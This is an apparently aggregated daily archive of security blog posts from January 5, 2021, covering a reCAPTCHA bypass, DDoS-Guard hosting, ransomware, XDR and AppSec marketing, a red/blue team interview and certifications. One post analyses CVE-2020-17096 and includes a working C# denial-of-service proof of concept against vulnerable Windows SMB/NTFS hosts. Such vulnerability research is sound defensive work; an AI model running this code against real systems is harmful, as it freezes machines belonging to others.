Daily Archives: January 5, 2021

Google Speech-to-Text API Can Help Attackers Easily Bypass Google reCAPTCHA

A three-year-old attack technique to bypass Google's audio reCAPTCHA by using its own Speech-to-Text API has been found to still work with 97% accuracy. Researcher Nikolai Tschacher disclosed his findings in a proof-of-concept (PoC) of the attack on January 2. "The idea of the attack is very simple: You grab the MP3 file of the audio reCAPTCHA and you submit it to Google's own speech-to-text API

NIST SP 800-128 – Because Patching May Never Fix Your Hidden Flaws

Over the last few years, the idea of patching systems to correct flaws has graduated from an annoying business disruption to a top priority. With all of the notorious vulnerabilities that can wreak total havoc, the time it takes to patch becomes a minor inconvenience when weighed against both the technical challenges and possible regulatory penalties […]… Read More

The post NIST SP 800-128 – Because Patching May Never Fix Your Hidden Flaws appeared first on The State of Security.

Keeping Your Garage Secure Using a Raspberry Pi

It is always unfortunate when the garage door is left open when you leave for an extended period of time. This has happened to me a couple of times. By leaving the garage door open, I was inviting unwanted guests into the garage. An unwanted guest can be animals looking for a meal and spreading […]… Read More

The post Keeping Your Garage Secure Using a Raspberry Pi appeared first on The State of Security.

Hamas May Be Threat to 8chan, QAnon Online

In October 2020, KrebsOnSecurity looked at how a web of sites connected to conspiracy theory movements QAnon and 8chan were being kept online by DDoS-Guard, a dodgy Russian firm that also hosts the official site for the terrorist group Hamas. New research shows DDoS-Guard relies on data centers provided by a U.S.-based publicly traded company, which experts say could be exposed to civil and criminal liabilities as a result of DDoS-Guard’s business with Hamas.

Many of the IP address ranges in in this map of QAnon and 8Chan-related sites — are assigned to VanwaTech. Source: twitter.com/Redrum_of_Crows

Last year’s story examined how a phone call to Oregon-based CNServers was all it took to briefly sideline multiple websites related to 8chan/8kun — a controversial online image board linked to several mass shootings — and QAnon, the far-right conspiracy theory which holds that a cabal of Satanic pedophiles is running a global child sex-trafficking ring and plotting against President Donald Trump.

From that piece:

A large number of 8kun and QAnon-related sites (see map above) are connected to the Web via a single Internet provider in Vancouver, Wash. called VanwaTech (a.k.a. “OrcaTech“). Previous appeals to VanwaTech to disconnect these sites have fallen on deaf ears, as the company’s owner Nick Lim reportedly has been working with 8kun’s administrators to keep the sites online in the name of protecting free speech.

After that story, CNServers and a U.K.-based hosting firm called SpartanHost both cut ties with VanwaTech. Following a brief disconnection, the sites came back online with the help of DDoS-Guard, an Internet company based in Russia. DDoS-Guard is now VanwaTech’s sole connection to the larger Internet.

A review of the several thousand websites hosted by DDoS-Guard is revelatory, as it includes a vast number of phishing sites and domains tied to cybercrime services or forums online.

Replying to requests for comment from a CBSNews reporter following up on my Oct. 2020 story, DDoS-Guard issued a statement saying, “We observe network neutrality and are convinced that any activity not prohibited by law in our country has the right to exist.”

But experts say DDoS-Guard’s business arrangement with a Denver-based publicly traded data center firm could create legal headaches for the latter thanks to the Russian company’s support of Hamas.

In a press release issued in late 2019, DDoS-Guard said its services rely in part on a traffic-scrubbing facility in Los Angeles owned by CoreSite [NYSE:COR], a real estate investment trust which invests in “carrier-neutral data centers and provides colocation and peering services.”

This facilities map published by DDoS-Guard suggests the company’s network actually has at least two points of presence in the United States.

Hamas has long been named by the U.S. Treasury and State departments as a Specially Designated Global Terrorist (SDGT) organization. Under such a designation, any U.S. person or organization that provides money, goods or services to an SDGT entity could face civil and/or criminal prosecution and hefty fines ranging from $250,000 to $1 million per violation.

Sean Buckley, a former Justice Department prosecutor with the law firm Kobre & Kim, said U.S. persons and companies within the United States “are prohibited from any transaction or dealing in property or interests in property blocked pursuant to an entity’s designation as a SDGT, including but not limited to the making or receiving of any contribution of funds, goods, or services to or for the benefit of individuals or entities so designated.”

CoreSite did not respond to multiple requests for comment. But Buckley said companies can incur fines and prosecution for violating SDGT sanctions even when they don’t know that they are doing so.

In 2019, for example, a U.S. based cosmetics company was fined $1 million after investigators determined its eyelash kits were sourcing materials from North Korea, even though the supplier in that case told the cosmetics firm the materials had come from China.

“U.S. persons or companies found to willfully violate these regulations can be subject to criminal penalties under the International Emergency Economic Powers Act,” Buckley said. “However, even in the case that they are unaware they’re violating these regulations, or if the transaction isn’t directly with the sanctioned entity, these companies still run a risk of facing substantial civil and monetary penalties by the Department of Treasury’s Office of Foreign Asset Control if the sanctioned entity stands to benefit from such a transaction.”

DDoS-Guard said its partnership with CoreSite will help its stable of websites load more quickly and reliably for people visiting them from the United States. It is possible that when and if CoreSite decides it’s too risky to continue doing business with DDoS-Guard, sites like those affiliated with Hamas, QAnon and 8Chan may become more difficult to reach.

Meanwhile, DDoS-Guard customer VanwaTech continues to host a slew of sites promoting the conspiracy theory that the U.S. 2020 presidential election was stolen from President Donald Trump via widespread voting fraud and hacked voting machines, including maga[.]host, donaldsarmy[.]us, and donaldwon[.]com.

These sites are being used to help coordinate a protest rally in Washington, D.C. on January 6, 2021, the same day the U.S. Congress is slated to count electoral votes certified by the Electoral College, which in December elected Joseph R. Biden as the 46th president of The United States.

In a tweet late last year, President Trump urged his supporters to attend the Jan. 6 protest, saying the event “will be wild.”

8chan, which has rebranded as 8kun, has been linked to white supremacism, neo-Nazism, antisemitism, multiple mass shootings, and child pornography. The FBI in 2019 identified QAnon as a potential domestic terror threat, noting that some of its followers have been linked to violent incidents motivated by fringe beliefs.

NTFS Remote Code Execution (CVE-2020-17096) Analysis

NTFS Remote Code Execution (CVE-2020-17096) Analysis

This is an analysis of the CVE-2020-17096 vulnerability published by Microsoft on December 12, 2020. The remote code execution vulnerability assessed with Exploitation: “More Likely”,  grabbed our attention among the last Patch Tuesday fixes.

Diffing ntfs.sys

Comparing the patched driver to the unpatched version with BinDiff, we saw that there’s only one changed function, NtfsOffloadRead.

Diffing ntfs sys

The function is rather big, and from a careful comparison of the two driver versions, the only changed code is located at the very beginning of the function:

BinDiff - NtfsOffloadRead
uint NtfsOffloadRead(PIRP_CONTEXT IrpContext, PIRP Irp)
{
  PVOID decoded = NtfsDecodeFileObjectForRead(...);
  if (!decoded) {
    if (NtfsStatusDebugFlags) {
      // ...
    }
    // *** Change 1: First argument changed from NULL to IrpContext
    NtfsExtendedCompleteRequestInternal(NULL, Irp, 0xc000000d, 1, 0);
    // *** Change 2: The following if block was completely removed
    if (IrpContext && *(PIRP *)(IrpContext + 0x68) == Irp) {
      *(PIRP *)(IrpContext + 0x68) = NULL;
    }
    if (NtfsStatusDebugFlags) {
      // ...
    }
    return 0xc000000d;
  }

  // The rest of the function...
}

Triggering the vulnerable code

From the name of the function, we deduced that it’s responsible for handling offload read requests, part of the Offloaded Data Transfers functionality introduced in Windows 8. An offload read can be requested remotely via SMB by issuing the FSCTL_OFFLOAD_READ control code.

Indeed, by issuing the FSCTL_OFFLOAD_READ control code we’ve seen that the NtfsOffloadRead function is being called, but the first if branch is skipped. After some experimentation, we saw that one way to trigger the branch is by opening a folder, not a file, before issuing the offload read.

Exploring exploitation options

We looked at each of the two changes and tried to come up with the simplest way to cause some trouble to a vulnerable computer.

  • First change: The NtfsExtendedCompleteRequestInternal function wasn’t receiving the IrpContext parameter.

    Briefly looking at NtfsExtendedCompleteRequestInternal, it seems that if the first parameter is NULL, it’s being ignored. Otherwise, the numerous fields of the IrpContext structure are being freed using functions such as ExFreePoolWithTag. The code is rather long and we didn’t analyze it thoroughly, but from a quick glance we didn’t find a way to misuse the fact that those functions aren’t being called in the vulnerable version. We observed, thought, that the bug causes a memory leak in the non-paged pool which is guaranteed to reside in physical memory.

    We implemented a small tool that issues offload reads in an infinite loop. After a couple of hours, our vulnerable VM ran out of memory and froze, no longer responding to any input. Below you can see the Task Manager screenshots and the code that we used.

  • Second change: An IRP pointer field, part of IrpContex, was set to NULL.

    From our quick attempt, we didn’t find a way to misuse the fact that the IRP pointer field is set to NULL. If you have any ideas, let us know.

What about remote code execution?

We’re curious about that as much as you are. Unfortunately, there’s a limited amount of time that we can invest in satisfying our curiosity. We went as far as finding the vulnerable code and triggering it to cause a memory leak and an eventual denial of service, but we weren’t able to exploit it for remote code execution.

It is possible that there’s no actual remote code execution here, and it was marked as such just in case, as it happened with the “Bad Neighbor” ICMPv6 Vulnerability (CVE-2020-16898). If you have any insights, we’ll be happy to hear about them.

CVE-2020-17096 POC (Denial of Service)

Before. An idle VM with a standard configuration and no running programs.

After. The same idle VM after triggering the memory leak, unresponsive.

using (var trans = new Smb2ClientTransport())
{
    var ipAddress = System.Net.IPAddress.Parse(ip);
    trans.ConnectShare(server, ipAddress, domain, user, pass, share, SecurityPackageType.Negotiate, true);

    trans.Create(
        remote_path,
        FsDirectoryDesiredAccess.GENERIC_READ | FsDirectoryDesiredAccess.GENERIC_WRITE,
        FsImpersonationLevel.Anonymous,
        FsFileAttribute.FILE_ATTRIBUTE_DIRECTORY,
        FsCreateDisposition.FILE_CREATE,
        FsCreateOption.FILE_DIRECTORY_FILE);

    FSCTL_OFFLOAD_READ_INPUT offloadReadInput = new FSCTL_OFFLOAD_READ_INPUT();
    offloadReadInput.Size = 32;
    offloadReadInput.FileOffset = 0;
    offloadReadInput.CopyLength = 0;

    byte[] requestInputOffloadRead = TypeMarshal.ToBytes(offloadReadInput);

    while (true)
    {
        trans.SendIoctlPayload(CtlCode_Values.FSCTL_OFFLOAD_READ, requestInputOffloadRead);
        trans.ExpectIoctlPayload(out _, out _);
    }
}

C# code that causes the memory leak and the eventual denial of service. Was used with the Windows Protocol Test Suites.

Nature vs. Nurture Tip 3: Employ SCA With SAST

For this year???s State of Software Security v11 (SOSS) report, we examined how both the ???nature??? of applications and how we ???nurture??? them contribute to the time it takes to close out a security flaw. We found that the ???nature??? of applications ??? like size or age ??? can have a negative effect on how long it takes to remediate a security flaw. But, taking steps to ???nurture??? the security of applications ??? like using multiple application security (AppSec) testing types ??? can have a positive effect on how long it takes to remediate security flaws.

In our first blog, Nature vs. Nurture Tip 1: Use DAST With SAST, we explored how organizations that combine DAST with SAST address 50 percent of their open security findings almost 25 days faster than organizations that only use SAST. In our second blog, Nature vs. Nurture Tip 2: Scan Frequently and Consistently, we addressed the benefits of frequent and consistent scanning by highlighting the SOSS finding that organization that scan their applications at least daily reduced time to remediation by more than a third, closing 50 percent of security flaws in 2 months.

For our third tip, we will explore the importance of software composition analysis (SCA) and how ??? when used in conjunction with static application security testing (SAST) ??? it can shorten the time it takes to address security flaws.

What is SCA and why is it important?

SCA inspects open source code for vulnerabilities. Some assume that open source code is more secure than first-party code because there are ???more eyes on it,??? but that is often not the case. In fact, according to our SOSS report, almost one-third of applications have more security findings in their third-party libraries than in primary code. Given that a typical Java application is 97 percent third-party code, this is a concerning statistic.

Flaws

Since SCA is the only AppSec testing type that can identify vulnerabilities in open source code, if you don???t employ SCA, you could find yourself victim of a costly breach. In fact, in 2017, Equifax suffered a massive data breach from Apache Struts that compromised the data ??? including Social Security numbers ??? of more than 143 million Americans. Following the breach, Equifax's stock fell over 13 percent.

How can SCA with SAST shorten time to remediation?

If you are only using static analysis to assess the security of your code, your attack surface is likely bigger than you think. You need to consider third-party code as part of your attack surface, which is only uncovered by using SCA.

By incorporating software composition analysis into your security testing mix, you can find and address more flaws. According to SOSS, organizations that employ ???good??? scanning practices (like SCA with SAST), tend to be more mature and further along in their AppSec journey. And organizations with mature AppSec programs tend to remediate flaws faster. For example, employing SCA with SAST cuts time to remediate 50 percent of security flaws by six days.

Practices that affect remediation

For more information on using SCA with SAST, or for additional tips on nurturing your applications, check out our recent State of Software Security report.

ツ?

One month after ransomware attack, Metro Vancouver’s transit system still not up to speed

TransLink, Metro Vancouver’s public transportation agency, has warned its staff that hackers accessed their personal bank account details and other information. The warning came in an internal email to workers approximately one month after Translink was struck by the Egregor ransomware and passengers had their journeys disrupted. Read more in my article on the Hot for Security blog.

The dynamic duo: How to build a red and blue team to strengthen your cybersecurity, Part 1

The security community is continuously changing, growing, and learning from each other to better position the world against cyber threats. In the first post of our new Voice of the Community blog series, Microsoft Product Marketing Manager Natalia Godyla talks with Jake Williams, Founder of Rendition Infosec. In part one of this blog Jake shares his insights on the 2020 threat landscape—who to watch for and why—and how to think about red and blue teaming within your organization.

Looking back at the threat landscape of 2020, what stands out?  

The biggest thing that stands out has to be the continued ransomware advances. With IANS, I actually coined the term ransomware 2.0 in early 2019. We were trying to differentiate between the drive-by ransomware attacks and what I call the more APT-style ransomware attacks, where they’re doing lateral movement and actively targeting backups before encryption. Disaster recovery (DR) plans work for the former but really not the latter because the latter cases are actively targeting disaster recovery infrastructure. What I saw this year was just a lot of advancement in attacks.

The second thing is that the number of different groups that are using that commodity malware has definitely gone up. They’re using that commodity malware to get back into orbit for initial access into a network. We’re seeing a lot more of that, like TrickBot. Cybersecurity professionals I’m talking to say, “the TrickBot takedown” but it was an interruption, not a takedown, unlike other malware and botnets in the past that have been wiped out. DNSChanger is a good example. DNSChanger was cut off at the knees but not TrickBot. This is a flesh wound.

We’re seeing a lot more of this commodity malware being used as an entryway. This is the stuff that a lot of folks, myself included, have been talking about for years. This is always a risk. You can’t just say, “Don’t worry, Microsoft Defender Antivirus caught and quarantined it so we’re good now.” From maybe mid-September on, it’s been even more viral than the rest of the year put together. It’s really accelerating, too.

What critical threat groups should security teams be actively monitoring? 

The week before last, I was in a dark web forum and an account that I and a number of other folks in the intel community assess with moderate confidence to be associated with Ryuk was advertising for help with their ransomware operations. They’re looking for experienced ransomware operators, and they have a whole set of criteria, including that they want to see a history that you’re getting an average $400,000 payout. They haven’t asked for help in the past. They have more work than they can handle. That gives you an idea of scope, and I think it comes from the commodity malware. Before now, I haven’t seen large, established ransomware groups advertising for help with their operations. If they thought those accesses were going to last forever, they wouldn’t worry about recruiting others right now.

There’s definitely a place for dark web monitoring but most organizations don’t have the maturity level where they’re getting a good return on that investment. Because even if I tell you that cybercrime groups are recruiting, how do I take that and turn that into something actionable that will help with detection and prevention? I don’t know how much any guidance I provide will help if you’re not patching domain controllers.

From a cybercrime standpoint, we’re seeing a lot more lateral movement being critical to cybercriminals’ attacks. We’re not seeing as many point attacks where they land a phishing email and bam, they’ve extracted a bunch of data and gone. It sounds almost like a cop-out but focus on lateral movement because it kills two birds with one stone. Nation-state groups have to do a lateral movement. So do cybercrime groups to get maximum payouts. Once they’ve had a bite of that big apple, how do they ever go back? I think you’re seeing more groups spending in some cases up to six weeks in a network before they’re doing data extraction and playing a little bit of a longer game versus that immediate gratification.

Cybersecurity mixes both defensive and offensive practices to combat cybercrime. How should organizations think about red and blue teaming in their organization? Do organizations need both, and why?  

A huge majority of people who get into cybersecurity these days want to be red team. I get it. It’s sexy. Bottom line, if you’re thinking of red team as those folks who are actually attempting to penetrate your internal network, I think the number is 1 to 20, 1 to 25, or something like that compared to blue team. You need a lot less red team focus. I’m not saying that organizations where red team is similarly sized to blue don’t provide value. They definitely do, but it’s a question of could you take those same resources and plug them elsewhere and get more value? I think generally, I need a lot more defense than I need offense.

In way too many organizations that have much more balanced red and blue teams, I see a lot of red teams identifying problems that the blue team simply can’t fix from a resourcing standpoint. I also am working with organizations that have very large red teams but haven’t yet moved into hunt teaming. In those situations, I don’t know whether you put hunt under red or blue. I’m ambivalent there but the bottom line is I do need the red team, but I need them for a lot less than a lot of people use them for. I say that as an ex-government hacker; and I still do red team occasionally, but it’s just not where most organizations are going to get the most significant return on investment. I’m not trying to say red team isn’t important but generally, we need to structure significantly more blue team people than red team, and that’s just an unpopular thing for a lot of people to hear.

If you don’t have a solid blue team and have holes today in your defenses, you shouldn’t have a red team. When people say, “We need our own internal red team,” my question is, “Have you had an external red team come in and do a red team evaluation? And if you have, have you actioned those findings?” Not one of them but all of them. If the answer is no, we need to step back and figure out what we need to do. Let’s make sure that you’ve got a blue team that is functioning today and ready to roll forward with the recommendations from the red team. Separate from pragmatism, there’s also a legality issue. Knowing about something and not doing anything about it puts you in a more legally compromising position than not knowing about it at all.

That’s what we find a lot of folks with internal red teams end up with. They’ve got this red team that is basically pushing identified risks into a funnel. How much are we stuffing that funnel? How much do we need defense versus offense?

How does an organization know when to hire an internal red team? What’s the breaking point?

A lot of that depends on the reaction. How quickly are you actioning those findings? If you’re in a spot where you fix all the findings from the annual red team in two months, that’s when I would say, “Yes, without a shadow of a doubt, let’s go hire a red team.” Because that’s going to give me more of that constant churn of findings. On the other hand, if it takes you nine months to get through those findings, you’re going to have another external red team likely in a month anyway. Where’s our value there? If it takes you somewhere in the middle, a lot of it is going to depend on how much risk do we accept.

When we’re documenting where we have gaps and where we don’t, it comes down to where can I get the best return on my investment for our organization? If I still have a lot of blue team gaps, investing in red team would be throwing more gaps at blue team, which causes huge morale issues.

Keep an eye for the second part of the interview as Jake Williams shares best practices on how to structure and evolve red and blue teaming within your organization.

To learn more about Microsoft Security solutions visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity or on LinkedIn for the latest news and updates on cybersecurity.

The post The dynamic duo: How to build a red and blue team to strengthen your cybersecurity, Part 1 appeared first on Microsoft Security.

Announcing Veracode in AWS Marketplace: Streamlining Secure Software Development for AWS Customers

Digital transformation continues to accelerate, and with it, businesses continue to modernize their technological environments, leveraging developer-first cloud-native solutions to build, host, and secure their software. At Veracode, we continue to see customers leveraging large cloud providers, such as AWS, as a central platform to conduct these activities. Customers can take advantage of the many native services available from AWS as well as procure and manage relationships with AWS-certified partner solutions, such as Veracode, through the AWS Marketplace.

Which is why we are pleased to announce the launch of our public listing of Veracode Security Labs on the AWS Marketplace. This listing also enables us to sell our full portfolio of solutions through AWS Marketplace Private Offers. Buying through Marketplace creates more buying options for customers and enables AWS customers to quickly purchase and deploy Veracode???s leading SaaS software security solutions while centralizing billing through AWS. For AWS customers participating in AWS??? Enterprise Discount Program (EDP), purchasing Veracode through the marketplace can drive additional benefits and potential savings with AWS as a portion of the cost of Veracode can be applied towards the [your] overall annual spending obligations with AWS.

Since launch, several large customers in North America and Europe were successful in purchasing Veracode???s solutions via the AWS Marketplace, and are recognizing the variety of benefits offered to them by AWS.

Why Veracode?

When it comes to building effective and secure applications on a tight schedule, security tools need to be flexible enough to integrate and automate seamlessly into existing processes and workflows, but capable enough to get the job done. Through Veracode???s cloud-native application security (AppSec) solutions we aim to enable the speed, automation, and top-level scanning tools needed to write more secure code and continue hitting deadlines.

With Veracode???s solutions integrated into established processes, AppSec quickly becomes a competitive edge. In addition to the right scanning and testing tools embedded into critical stages of the software development lifecycle, Veracode enables organizations like yours to improve customer confidence through enhanced security, reduced risk, and proven compliance.

AppSec management and measurement is simplified through reliable metrics, progress demonstration, and clear goals. In addition, Veracode???s 1% false-positive rate means less time spent chasing the wrong flaws and more time ensuring your DevSecOps efforts stay on track to keep projects on schedule. It also means a shortened sales cycle that keeps businesses one step ahead of the competition.

There???s no need for lengthy security questionnaires with an established and functioning AppSec program, and sales are not lost due to security concerns from prospects. When Veracode???s cloud-native SaaS platform is in place, it???s possible to start scanning on day one to begin proving compliance and ensuring the quality of your code without missing a beat.

Secure software from the start

Having critical flexibility in the cloud with robust testing at your fingertips means that the security of your software is easier to manage to deployment and beyond. Through our integrations with AWS CodeStar and other developer tools, we deliver the critical functionality that developers need to initiate security scans ??? including right from AWS CodePipeline and AWS CodeBuild, saving vital remediation time. We also offer support for AWS Software Development Kits in Python, Node.js, and JavaScript, as well as support for Lambda functions.

Ready to get started integrating Veracode solutions into your AWS environment and improve the state of your organization???s AppSec? Visit our page on AWS Marketplace for more information, and learn about how our tools integrate with AWS here.ツ?

The Road to XDR

XDR (eXtended Detection and Response) is a cybersecurity acronym being used by most vendors today.  It is not a new strategy. It’s been around for a while but the journey for customers and vendors has been slow for many reasons. For McAfee, XDR has been integral to our vision, strategy and design philosophy that has guided our solution development for many years. Understanding our road to XDR can help your organization map your XDR journey.

The Building Pressure for XDR

Let’s start with why XDR?  The cry for XDR reflects where cybersecurity is today with fragmented, cumbersome and ineffective security and where folks want to go.  In my CISO conversations it is well noted that security operation centers (SOC) are struggling.  Disjointed control points and disparate tools lead to ineffective security teams.  It allows adversaries to more easily move laterally across the infrastructure undetected and moving intentionally erratic to avoid detection.  Analysts only know this if they manually connect the thousand dots which is time consuming leaving the adversaries with ample dwell time to do damage. It’s no secret. There is a lack of security expertise, and these are regularly tested.  Their investigations are cumbersome, highly manual, and riddled with blind spots. It’s nearly impossible to prioritize efforts, leaving the SOC simply buried in reactive cycles and alert fatigue.  Bottom line—SOC metrics are getting worse—while adversaries are becoming more sophisticated and creative in carrying out their mission.

XDR has the potential to be a one-stop solution to alleviating these SOC issues and improving operational inefficiencies.

XDR Options

Many cybersecurity providers are trying to offer an XDR capability of some sort. They promise to provide visibility and control across all vectors, and offer more analysis, context and automation to obtain faster and better response when reacting to a threat. Point players are limited to expertise in their domain (endpoint or network) and can’t offer a critical, proven cross-portfolio platform. After all, can your endpoint platform offer true XDR functionality it it’s not also connected to network, cloud and web?

McAfee’s long-time mantra has been Better Together. That mantra underscores our commitment to deliver comprehensive security that works cohesively across all threat vectors – device, network, web and cloud and with non-McAfee products.  Industry analysts and customers agree that McAfee is well positioned to deliver a solid XDR offering given our platform strategy and portfolio.

There is more to the McAfee XDR Story

Now, what if you had that same comprehensive XDR capability that not only offered visibility and control across the vectors, but also allows you to get ahead of adversary and empowering you to be more proactive. It could give you a heads up on threats that are likely to attack you based on global and industry trends, based on what your local environment looks like. With this highly credible prediction comes the prescribed guidance on how to counter the threat before it hits you. Imagine it also supplies prescriptive actions you can take to protect your users, data, applications and devices spanning from device to cloud. Other XDR conversations can’t take the conversation to this level of proactivity. McAfee can in our recently announced MVISION XDR.

Not only does McAfee take XDR to the next level, but it also helps you better mitigate cyber risk by enabling you to prioritize and focus on what most matters. What if your threat response was prioritized based on the impact to the organization? You need to understand what the attackers are targeting. How close are they to the most sensitive data based on the users and devices? MVISION XDR offers this context and data-awareness to focus your analysts on what counts. For example, threats that jeopardize sensitive data from a finance executive on his device will automatically be of priority versus a maybe threat on general purpose device with no data. This data-awareness is not noted well in other XDR conversations, but it is with recently announced MVISION XDR.  

Let’s look at McAfee’s journey and investment with XDR and how we got to this exceptional XDR approach.

McAfee XDR Journey

McAfee’s XDR Journey did not simply start up recently because a buzz word appeared that needed to spoke to.   As noted earlier, McAfee’s mantra “Together is Better” sets the stage for a unified security approach, which is core to the XDR promise.  McAfee recognized early on that multi-vendors security ecosystem is a key requirement to build a defense in depth security practice. OpenDXL the open-source community delivered the data exchange layer or the DXL message bus architecture. This enabled our diverse ecosystem of partners from threat intelligence platforms, to orchestration tools to use a common transport mechanism and information exchange protocol. Most enterprise security architectures will be a heterogenous mix of various security solutions. McAfee is one of the founding members of the Open CyberSecurity Alliance (OCA) where we contributed our DXL ontology – enabling participating vendors to not only communicate vital threat details but inform what to do to all connected multi-vendor security solutions.

Realizing EDR is network blind and SIEM is endpoint blind, we integrated McAfee EDR and SIEM.  McAfee continues to deliver XDR capabilities by bringing multiple telemetry sources on a platform from a single console for analytics and investigation, driving remediation decisions with automatic enforcement across the enterprise.  When you combine  MVISION XDR the first proactive, data-aware and open XDR and released MVISION Marketplace and API further supporting the open security ecosystem for XDR capabilities, organizations have a solid starting point to advance their visibility and control across their entire cyber infrastructure.

Before all the XDR hype, McAfee customers have been on the XDR path. Our customers have already gained XDR capabilities and are positioned to grow with more XDR capabilities. I encourage you to check out the video below.

 

 

 

 

 

The post The Road to XDR appeared first on McAfee Blogs.

Warning: Cross-Platform ElectroRAT Malware Targeting Cryptocurrency Users

Cybersecurity researchers today revealed a wide-ranging scam targeting cryptocurrency users that began as early as January last year to distribute trojanized applications to install a previously undetected remote access tool on target systems. Called ElectroRAT by Intezer, the RAT is written from ground-up in Golang and designed to target multiple operating systems such as Windows, Linux, and

Introducing: Cisco’s Innovated Transparency Report

As our customers’ businesses evolve in complexity and scale, we are hyperaware of our responsibility as a data steward to protect the privacy and trusted relationships that drive our business forward.

For many years, Cisco has published* the number of demands for customer data that we receive from law enforcement and governments around the world. In an age of growing geopolitical tensions, evolving threat landscapes, and increasing demands for corporate transparency, tech companies must stay focused on the steps they are taking to ensure customer privacy is recognized as a human right and a business imperative. A human focus is at the heart of every aspect of Cisco innovation, and we continuously work to make this apparent to our customers.

We listen to our customers’ security and privacy concerns as a guide to help shape our company and practices, all with a goal of being a trusted partner at every step. In response, we have refreshed our Transparency Report to answer our customers’ top questions about government data demands. Our leading additions are outlined below.

Global Map

The interactive map display gives geographic granularity into the very limited number of demands we receive from around the world. It illustrates the total disclosures of customer data by country and notes why some demands did not result in disclosure. One of the key metrics included in each country breakdown is the number of demands Cisco rejects during the given timeframe. We firmly hold law enforcement and governments accountable to our commitments to protect customer data, and this often includes rejecting requests that don’t meet our standards. Additionally, often Cisco does not have the data law enforcement is looking for, as illustrated by the no data disclosed metric.

Law Enforcement Guidelines

For the first time, we are publishing law enforcement guidelines to inform our customers and law enforcement agencies about the ways we protect customer data. It outlines the legal burden required of law enforcement agencies and governments when demanding customer data, and the laws to which these demands are subject. Cisco recognizes and appreciates government efforts to thwart bad actors and deter criminal activity. Nonetheless, we remain committed to ensuring that access to our solutions and services are protected from unlawful intrusion.

Frequently Asked Questions

At Cisco, we are constantly working on clear and simple communication to our customers, especially when it comes to important topics, like the ways in which we are protecting your data. We’ve added a Frequently Asked Questions (FAQ) section to guide customers through this crucial discussion. In this section, we reiterate that Cisco never allows backdoors or gives governments or law enforcement agencies direct access to content or non-content data without following appropriate legal process.

Our commitment to customers is to be open and transparent, particularly as it relates to issues that could potentially impact their business. As such, Our Principled Approach continues to guide every decision we make regarding government demands for customer data. It details the commitments we have made to protect customer privacy, minimize disclosure, and ensure we uphold and respect human rights.

To learn more about Cisco’s commitment to Transparency and Accountability, please visit our Trust Center or view our Global Data Demand Infographic. Questions about our Transparency Report or Our Principled Approach? Email: govt-data-requests@cisco.com

*Transparency report data is published twice yearly, covering a reporting period of either January-to-June or July-to-December. Cisco publishes this data six months after the end of a given reporting period, in compliance with legal restrictions on the timing of such reports.

Healthcare Industry Witnessed 45% Spike in Cyber Attacks Since Nov 20

Cyberattacks targeting healthcare organizations have spiked by 45% since November 2020 as COVID-19 cases continue to increase globally. According to a new report published by Check Point Research today and shared with The Hacker News, this increase has made the sector the most targeted industry by cybercriminals when compared to an overall 22% increase in cyberattacks across all industry sectors

The Top Cybersecurity Certifications in 2021

What are the Most Valued Cybersecurity Certifications in 2021?
This is an important question for employers, recruiters, seasoned security professionals, and especially for those planning a cybersecurity career. The Information Security Careers Network (ISCN) recently surveyed its LinkedIn community of over 90,000 members about the 50 leading cybersecurity industry certifications and courses. The results of which have been compiled into the following definitive top ten list of the most desired cybersecurity certifications in 2021.

CyberSecurity Certificates in High Demand by Employers
The Top Ten CyberSecurity Certificates and Courses


10. SANS Penetration Testing Courses
The selection of penetration testing courses and certifications offered by the SANS Institute are well regarded for helping both beginners and experts alike to increase technical cybersecurity expertise and paygrades. The SANS/GIAC Penetration Tester (GPEN)
9. Cybersecurity or Information Security University Degree
A cybersecurity or information security university degree is recommended for those looking to 'jumpstart' into a cybersecurity career, and for those seeking senior management and leadership roles as a career goal. However, most cybersecurity professionals surveyed by ISCN did not rate a degree as valuable to building up a ‘real world’ experience within dedicated junior security roles.

First or second class cybersecurity themed degrees with work experience (i.e. a sandwich course) from a reputable university can help a candidate's CV stand out from the crowd, but don't expect to walk straight into senior security professional roles without building up years of in-role experience.

The Times Higher Educational guide provides a list of the top universities offering computer science degrees.

8. Certified Cloud Security Professional (CCSP) by ISC2
Despite dropping a couple places from last year's ISCN survey, the Certified Cloud Security Professional (CSSP) from ISC2 remains popular among survey respondents, with 15% of them stating their intention to complete the course within the next 12-24 months.  

The popularity of CSSP has grown due to the migration from on-premise IT to cloud computing systems in recent years, with organisations short of expert security resources to help secure the cloud services which they are now highly dependent upon. 

CSSP is suitable for mid to advanced-level professionals involved with information security, IT architecture, governance, web and cloud security engineering, risk and compliance, as well as IT auditing. CCSP credential holders are competent in the following six domains:
  • Architectural Concepts and Design Requirements
  • Cloud Data Security
  • Cloud Platform and Infrastructure Security
  • Cloud Application Security
  • Operations
  • Legal and Compliance
Aside from the passing the CCSP exam, to achieve the certification, ISC2 requires information security professionals have a minimum of 5 years of work experience, including a minimum of 1 year of cloud security experience and 3 years of information security experience

7. CompTIA Security+
CompTIA Security+ is considered one of the best introductory security qualifications, suited for those taking their first steps in building a cybersecurity career.  As a globally recognised security certification, holding the CompTIA Security+ certification demonstrates knowledge of the baseline skills necessary to perform core security roles and functions. 

CompTIA Security+ provides a good platform to build an IT security career, useful for gaining junior security roles to help buildup all-important in-role experience and serves as a good foundation in taking on the more advanced topics found on the elite security certifications. 26% of survey respondents praised CompTIA Security+ relevance to real-world scenarios.

6. Certified Chief Information Security Officer (CCISO) by EC-Council
Increasing in popularity in recent years is the Certified Chief Information Security Officer (CCISO) by the EC-Council, which is suitable for those seeking to be promoted into senior managerial, leadership, and executive-level positions. 
33% of cybersecurity professionals stated that this course is one of the best for equipping participants to succeed in managerial positions. 

CCISO is considered the industry-leading CISO role training course. To achieve this certification, five years of experience is required in each of the course's five domains, along with passing the CCISO exam.
  1. Governance and Risk Management
  2. Information Security Controls, Compliance, and Audit Management
  3. Security Program Management and Operations
  4. Information Security Core Competencies
  5. Strategic Planning, Finance, Procurement, Vendor Management
5. Cisco Certified Network Professional (CCNP) Security
The Cisco Certified Network Professional certification (CCNP) Security remains a network security certification desired by employers, with 23% of surveyed respondents citing CCNP Security as a certification in demand. As a professional technical certification, Cisco's CCNP requires the passing of a core exam and a 'concentration exam' of your choice.

4. Certified Ethical Hacker (CEH) by EC-Council
EC-Council’s Certified Ethical Hacker (CEH) qualification consistently ranks near the top of security accreditations which are in highest demand within the security industry. The CEH course teaches practically on how to use the latest commercial-grade hacking tools, techniques, and methodologies to ethically and lawfully hack organisations.

